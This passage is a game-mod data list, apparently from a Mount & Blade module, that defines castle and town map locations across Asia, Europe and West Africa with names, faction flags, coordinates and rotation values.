("khongirad", "Khongirad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-967.2, -268.68), [], 15.0),
("hulunber", "Hulunber", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1079.32, -306.68), [], 175.0),
("ulaanbaatar", "Ulaanbaatar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-938.04, -288.88), [], 275.0),
("khongirad_ger", "Khongirad ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-962.88, -298.24), [], 90.0),
("olkhunuud_ger", "Olkhunuud ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1026.28, -257.0), [], 170.0),
("hulunber_yurt", "Hulunber yurt", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1044.16, -313.92), [], 295.0),
("ulaanbaatar_yurt", "Ulaanbaatar yurt", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-923.6, -275.44), [], 25.0),
("gorgonac_ger", "Gorgonac ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-997.16, -310.36), [], 170.0),
("tola", "Tola", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-849.18, -297.1), [], 175.0),
("kyrgyz", "Kyrgyz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-871.92, -301.24), [], 80.0),
("oirats", "Oirats", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-759.6, -321.2), [], 115.0),
("kyzyl", "Kyzyl", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-803.08, -343.98), []),
("kyrgyz_ger", "Kyrgyz ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-858.4, -325.6), [], 170.0),
("tola_ger", "Tola ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-834.1, -281.68), [], 170.0),
("zaysan", "Zaysan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-697.68, -282.48), [], 15.0),
("ulaangom", "Ulaangom", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-776.92, -321.96), [], 155.0),
("toledo", "Toledo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (274.0932, -180.8844), [], 170.0),
("sevilla", "Sevilla", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (294.4, -149.2), [], 260.0),
("murcia", "Murcia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (241.6, -157.0), [], 260.0),
("valencia", "Valencia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (234.4, -175.6), [], 225.0),
("barcelona", "Barcelona", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (205.2, -200.8), [], 225.0),
("zaragoza", "Zaragoza", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (239.16, -203.36), [], 125.0),
("cordova", "Cordova", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (282.32, -156.0), [], 25.0),
("leon", "Leon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (289.96, -215.6), [], 35.0),
("badahose", "Badahose", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (305.4, -167.88), [], 155.0),
("burgos", "Burgos", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (269.88, -212.44), [], 55.0),
("merida", "Merida", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (297.96, -169.08), [], 10.0),
("baza", "Baza", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (261.68, -152.76), [], 35.0),
("madrid", "Madrid", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (269.64, -187.64), []),
("salamanca", "Salamanca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (291.16, -194.44), [], 40.0),
("almagro", "Almagro", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (271.28, -167.14), [], 20.0),
("tortosa", "Tortosa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (217.36, -197.04), [], 10.0),
("huelva", "Huelva", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (305.2, -147.84), [], 240.0),
("cuenca", "Cuenca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (255.48, -181.88), [], 180.0),
("palma", "Palma", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (197.36, -176.92), [], 240.0),
("cieza", "Cieza", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (245.56, -163.84), [], 125.0),
("bilbao", "Bilbao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (258.0, -223.2), [], 45.0),
("szeged", "Szeged", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (9.28, -265.56), [], 290.0),
("belgrade", "Belgrade", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (5.76, -245.56), [], 115.0),
("zagreb", "Zagreb", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (54.8, -259.2), [], 260.0),
("clujnapoca", "ClujNapoca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-28.32, -272.72), [], 45.0),
("perek", "Perek", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-2.72, -304.4), [], 45.0),
("tuircmureci", "Tuircmureci", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-38.8, -268.8), [], 65.0),
("debrecen", "Debrecen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-6.64, -283.44), []),
("pecs", "Pecs", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (30.52, -262.64), []),
("graz", "Graz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (61.08, -276.8), [], 90.0),
("nis", "Nis", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-10.08, -225.64), [], 80.0),
("petro_baradin", "Petro Baradin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (12.4, -232.2), [], 90.0),
("arad", "Arad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-3.44, -264.0), [], 80.0),
("budapest", "Budapest", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (21.44, -283.4), [], 35.0),
("kraljevo", "Kraljevo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-31.04, -238.92), [], 90.0),
("miskolc", "Miskolc", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (2.68, -291.2), [], 30.0),
("novi_sad", "Novi sad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (12.8, -251.4), [], 315.0),
("lisbon", "Lisbon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (329.12, -167.96), [], 120.0),
("coimbra", "Coimbra", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (321.2, -184.4), [], 255.0),
("braga", "Braga", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (321.2, -202.0), [], 255.0),
("faro", "Faro", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (316.4, -145.56), [], 45.0),
("porto", "Porto", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (323.44, -196.92), [], 160.0),
("evora", "Evora", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (315.4, -163.88), [], 60.0),
("braganca", "Braganca", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (301.56, -204.84), [], 260.0),
("constantinople", "Constantinople", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-86.34, -196.3), [], 90.0),
("ancyra", "Ancyra", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-129.08, -180.6), [], 45.0),
("chonai", "Chonai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-88.0, -154.0), [], 260.0),
("adrianople", "Adrianople", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-60.8, -203.2), [], 180.0),
("marcianopolis", "Marcianopolis", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-75.04, -223.8), [], 190.0),
("bucharest", "Bucharest", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-55.56, -240.12), []),
("karaman", "Karaman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-133.28, -147.12), []),
("sivas", "Sivas", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-175.08, -178.76), [], 275.0),
("samsun", "Samsun", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-166.8, -197.6), [], 10.0),
("manisa", "Manisa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-70.08, -164.44), [], 90.0),
("tarnovo", "Tarnovo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-53.88, -227.8), [], 90.0),
("baris", "Baris", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-104.4, -155.0), [], 35.0),
("thyatira", "Thyatira", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-90.04, -173.44), [], 45.0),
("gallipoli", "Gallipoli", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-60.3, -187.14), [], 45.0),
("buzau", "Buzau", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-63.52, -249.88), [], 25.0),
("iconium", "Iconium", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-125.28, -155.28), [], 145.0),
("attalia", "Attalia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-107.2, -144.0), [], 315.0),
("angkor_thom", "Angkor Thom", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-898.8, 108.8), []),
("tuguegarao", "Tuguegarao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1100.0, 69.2), [], 240.0),
("sukhothai", "Sukhothai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-864.99, 88.97), [], 45.0),
("naypyidaw", "Naypyidaw", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-820.0, 46.4), [], 280.0),
("hanoi", "Hanoi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-926.4, 34.0), [], 15.0),
("luang_namtha", "Luang namtha", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-878.08, 34.6), [], 145.0),
("kohima", "Kohima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-798.36, -13.8), [], 15.0),
("myeik", "Myeik", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-847.64, 121.0), [], 170.0),
("hainan", "Hainan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-969.6, 51.8), [], 110.0),
("baguio", "Baguio", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1087.6, 79.88), [], 240.0),
("danang", "Danang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-951.6, 85.88), [], 260.0),
("thaton", "Thaton", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-834.4, 75.48), [], 55.0),
("nha_trang", "Nha trang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-963.08, 122.52), [], 260.0),
("lashio", "Lashio", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-838.4, 13.84), [], 115.0),
("udon_thani", "Udon thani", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-893.48, 71.6), [], 25.0),
("shwebo", "Shwebo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-815.84, 17.44), [], 25.0),
("namman", "Namman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-877.68, -0.12), [], 115.0),
("xuchang", "Xuchang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1014.0, -109.2), [], 290.0),
("luoyang", "Luoyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-999.6, -113.6), [], 90.0),
("kaifeng", "Kaifeng", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1019.16, -118.68), [], 80.0),
("puyang", "Puyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1027.12, -129.8), [], 125.0),
("taikang", "Taikang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1025.12, -109.76), [], 125.0),
("jinan", "Jinan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1050.86, -139.78), [], 115.0),
("liaocheng", "Liaocheng", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1037.32, -138.2), [], 175.0),
("yanjin", "Yanjin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1017.8, -122.48), [], 110.0),
("heze", "Heze", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1032.04, -123.68), [], 120.0),
("pingdingshan", "Pingdingshan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1007.36, -107.6), [], 15.0),
("zibo", "Zibo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1059.88, -141.96), [], 45.0),
("taian", "Taian", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1049.28, -135.12), [], 90.0),
("bozhou", "Bozhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1037.62, -109.04), [], 65.0),
("jilin", "Jilin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1152.8, -231.16), [], 80.0),
("mishan", "Mishan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1201.2, -251.6), [], 45.0),
("harbin", "Harbin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1150.82, -259.56), [], 90.0),
("siping", "Siping", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1128.56, -223.08), [], 275.0),
("yi_chun", "Yi chun", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1177.96, -286.88), [], 100.0),
("mudanjiang", "Mudanjiang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1185.4, -241.44), [], 100.0),
("songyuan", "Songyuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1134.0, -250.68), [], 100.0),
("qiqihar", "Qiqihar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1124.16, -280.92), [], 115.0),
("changchun", "Changchun", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1139.6, -232.0), []),
("hinggan", "Hinggan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1103.96, -262.76), [], 240.0),
("onon", "Onon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-959.6, -332.4), [], 155.0),
("merkit", "Merkit", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-894.8, -369.08), [], 45.0),
("darkhan", "Darkhan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-927.8, -311.92), []),
("onon_ger", "Onon ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-941.6, -348.92), [], 110.0),
("merkit_ger", "Merkit ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-892.4, -327.48), [], 120.0),
("tayichiud", "Tayichiud", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1006.16, -352.39), [], 130.0),
("erdenet", "Erdenet", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-907.76, -305.64), [], 45.0),
("xining", "Xining", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-882.28, -140.32), [], 25.0),
("qingyang", "Qingyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-947.84, -130.44), [], 25.0),
("anding", "Anding", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-912.04, -127.56), [], 65.0),
("tianshui", "Tianshui", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-925.2, -115.2), [], 85.0),
("haixi", "Haixi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-834.04, -149.8), [], 125.0),
("longnan", "Longnan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-916.16, -102.0), [], 170.0),
("pingliang", "Pingliang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-934.96, -126.36), [], 170.0),
("lanzhou", "Lanzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-905.28, -133.6), [], 170.0),
("gannan", "Gannan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-894.68, -120.92), [], 180.0),
("wuwei", "Wuwei", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-892.08, -156.1204), [], 240.0),
("aktube", "Aktube", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-394.8, -324.0), [], 270.0),
("volgograd", "Volgograd", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-258.28, -298.64), []),
("aralsk", "Aralsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-444.76, -274.2), [], 90.0),
("atyrau", "Atyrau", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-336.44, -279.6), [], 185.0),
("kyzylorda", "Kyzylorda", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-487.72, -246.68), [], 275.0),
("saratov", "Saratov", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-273.12, -343.56), [], 90.0),
("surabaya", "Surabaya", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1001.72, 313.44), [], 90.0),
("palembang", "Palembang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-916.72, 267.1), [], 225.0),
("kuala_lumpur", "Kuala lumpur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-881.24, 211.56), [], 55.0),
("davao", "Davao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1140.96, 172.52), [], 65.0),
("pontianak", "Pontianak", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-965.12, 240.12), [], 315.0),
("makassar", "Makassar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1075.7, 293.36), [], 225.0),
("palu", "Palu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1079.6, 251.08), [], 155.0),
("banduang", "Banduang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-943.2, 308.32), [], 225.0),
("banzarmasin", "Banzarmasin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1022.98, 275.76), [], 145.0),
("medan", "Medan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-848.0, 207.6), [], 45.0),
("kota_kinabalu", "Kota kinabalu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1039.04, 184.56), [], 265.0),
("kurching", "Kurching", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-975.68, 227.2), [], 125.0),
("cebu", "Cebu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1123.64, 141.82), [], 255.0),
("timbuktu", "Timbuktu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (260.76, 76.4), [], 190.0),
("bamako", "Bamako", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (158.74, 58.24), [], 180.0),
("gao", "Gao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (232.12, 81.74), [], 45.0),
("tamale", "Tamale", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (239.0, 150.6), [], 315.0),
("dakar", "Dakar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (416.36, 98.6), [], 25.0),
("abidjan", "Abidjan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (273.76, 190.32), []),
("niamey", "Niamey", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (204.96, 109.26), [], 315.0),
("djenne", "Djenne", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (277.84, 104.24), [], 125.0),
("accra", "Accra", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (232.24, 188.2), [], 270.0),
("peixian", "Peixian", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1048.8, -117.62), [], 15.0),
("jining", "Jining", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1048.52, -123.22), [], 45.0),
("tianjin", "Tianjin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1050.8, -170.8), [], 240.0),
("weifang", "Weifang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1072.16, -141.4), [], 240.0),
("pingyuan", "Pingyuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1042.2, -146.76), [], 150.0),
("linzhang", "Linzhang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1022.08, -136.8), [], 225.0),
("hengshui", "Hengshui", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1033.8, -153.8), [], 290.0),
("shijiazhuang", "Shijiazhuang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1021.32, -157.8), [], 315.0),
("taiyuan", "Taiyuan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1001.58, -154.22), [], 245.0),
("qingdao", "Qingdao", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1085.2, -134.2), []),
("hekou", "Hekou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1065.08, -155.56), [], 170.0),
("yangquan", "Yangquan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1011.24, -155.24), [], 170.0),
("haixing", "Haixing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1055.72, -158.8), [], 90.0),
